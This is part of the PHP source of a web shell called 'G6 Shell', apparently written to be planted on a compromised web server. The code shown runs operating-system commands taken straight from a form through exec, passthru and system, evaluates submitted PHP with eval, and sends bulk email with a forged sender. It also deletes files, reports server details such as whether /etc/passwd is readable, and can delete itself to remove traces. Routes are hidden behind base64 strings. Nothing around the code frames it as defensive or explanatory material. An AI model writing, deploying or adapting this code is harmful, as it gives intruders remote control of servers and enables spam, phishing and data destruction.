                        <table><tr><td>To Email(s): </td><td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; width:220px;" name="email" placeholder="email@address.com" /></tr><tr><td>Subject: </td>       <td><input type="text" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px" name="subject" /></td></tr><tr><td>From Email: </td><td><input type="email" style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px;" name="fromEmail" placeholder="example@google.com" /></td></tr><tr><td>Message: </td><td></td></tr></table><table><tr><td><textarea style="background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; height:200px;width:290px;" name="message"></textarea></td></tr><tr><td><input type="submit" name="send" value="Send Message(s)" /></td></tr></table></form>
                        <?php
        if(isset($_POST['send'])){ $email = $_POST['email'];$subject = $_POST['subject'];$from = $_POST['fromEmail'];$message = $_POST['message'];if($email&&$subject&&$from&&$message){$emails = explode(";", $email);foreach($emails as $email){mail($email, $subject, $message, "From: ".$from);     }}}
}elseif(strstr($CurrentUrl, "delete")){
        if(!is_dir($delete)){unlink($delete);}else{rmdir($delete);}
                header("Location: ".$_SERVER['HTTP_REFERER']);
}elseif(strstr($CurrentUrl, "c3J2aW5mbw")){
        get_srv_info();
  $s_safemode = ini_get("safe_mode");
  if($s_safemode = TRUE){$s_safemode = "<span class='enabled'>[ON";}else{$s_safemode = "<span class='disabled'>[OFF"; }
  if(extension_loaded('curl')){$curls="<span class='enabled'>[ON]</span>";}else{$curls="<span class='disabled'>[OFF]</span>";}
        echo "<b>Server Port: </b>".$_SERVER['SERVER_PORT']."<br /><br /><b>HTTP Connection: </b>".$_SERVER['HTTP_CONNECTION']."<br /><br /><b>Operating System:</b> ".php_uname()."<br /><br />";
        if(get_magic_quotes_gpc()){echo "<b>Magic Quotes:</b> <span class='enabled'>[ENABLED]</span><br /><br />";}else{echo "<b>Magic Quotes:</b> <span class='disabled'>[DISABLED]</span><br /><br />";}
        echo "<b>PHP Version:</b> ".phpversion()."<br /><br /><b>Safe Mode: </b>".$s_safemode."]</span><br /><br /><b>Curl: </b>".$curls."<br /><br /><b>Accept Encoding: </b> ".$_SERVER['HTTP_ACCEPT_ENCODING']."<br /><br /><b>Admin: </b>".$_SERVER['SERVER_ADMIN']."<br /><br /><strong>Disabled Functions: </strong>";
        if(!empty($disabled)){
        foreach($disabled as $functionsdis){
                echo $functionsdis.", ";
        }
        }else{
                echo "none";
        }
        echo "<br /><br /><strong>/etc/passwd: </strong>";
        if(is_readable("/home/etc/passwd")){
                echo "<span style='color:green;'>Readable</span>";
        }else{
                echo "<span style='color:red;'>Unreadable</span>";
        }
}elseif(strstr($CurrentUrl, "dGVybWlhbmw")){
       
        get_srv_info();
        ?>
                <p>Command line execution via exec, passthru or system.</p>
               
                <form action="" method="post"><table><tr><td><b>Command Execution: </b></td><td><input type="text" placeholder="root~$ " autocomplete="off" name="command" class="command"/></td></tr></table>
        <?php
                $out = array();
                if(cmd()=="exec"){
                        echo "Using: exec => ";
                        exec($_POST['command'], $out);
                        foreach ($out as $line) {
                                echo "$line\n";
                        }
                }elseif (cmd()=="passthru") {  
 
                        echo "Using: passthru => ";                    
                        passthru($_POST['command'], $out);
                        foreach ($out as $line) {
                                echo "$line\n";
                        }
                }elseif(cmd()=="system"){
                        echo "Using: system => ";
                        system($_POST['command'], $out);
                        foreach ($out as $line) {
                                echo "$line\n";
                        }
                }
}elseif(strstr($CurrentUrl, "a253aXN1ZQ")){
        get_srv_info();
        echo "
                <h4>Information</h4>
                <p>G6 Shell v".$shellVersion." Open Beta Edition - coded by Mr. P-teo, below are the known issues and bugs.</p>";
 
                ?>
                <ul>
                        <li>is_dir function not returning correct result within child dirs of the file browser.</li>
                        <li>File Browser controls, e.g. rename, create file, delete full dir.</li>
                        <li>Editing can run into trouble with GET Method Not Implemented error.</li>
                </ul>
                <br /><br />
        <?php
}elseif(strstr($CurrentUrl, "?eval")){
        get_srv_info();
        ?>
        <div style="float:left;width:700px;">
        <h4>Eval (PHP code execution)</h4>
        <form action="" method="post">
                <textarea name="phpeval" style="width:700px;height:190px;padding:5px;background:#CCCCCC;">//Example, get all PHP info about the server
 
echo phpinfo();</textarea><br />
                <input style="padding:4px 10px;margin:10px 0px;" name="evalexecute" value="Execute Code" type="submit"/>
        </form>
        </div>
        <div style="float:right;width:250px;">
                <h4>Information</h4>
                <p>Enter your specified php code within the textarea and wait for the response.</p>
                <p><strong>Example: </strong><i>echo phpinfo();</i></p><br /><br />
                <h4>Warning</h4>
                <p>including external files with seperate stylesheets may affect the apearence of G6 styles.</p>
        </div>
        <?php
                if(isset($_POST['evalexecute'])){
                        eval($_POST['phpeval']);
                }
}elseif(strstr($CurrentUrl, "?srmve")){
                get_srv_info();
        ?>
        <p>If you are sure you wish to remove the shell click the button below, make sure you are certain as you wil only have one shot at this.</p>
        <form action="" method="post">
                <center><input style="padding:7px 15px;margin:10px 0px;" name="Remove" value="Remove Shell" type="submit"/></center>
        </form>
        <?php
        if(isset($_POST['Remove'])){
                if(file_exists(__FILE__)){
                        unlink(__FILE__);
                }
        }
}else{
        get_srv_info();
 
?>
        <br /><br /><br /><br /><div class='Logo'>G6 v<?php echo $shellVersion; ?></div><div class='logotext'>Private Shell Coded By Mr. P-teo</div><br /><br /><br />
        <?php
}
ob_flush();
?>
</div>
<body>
</html>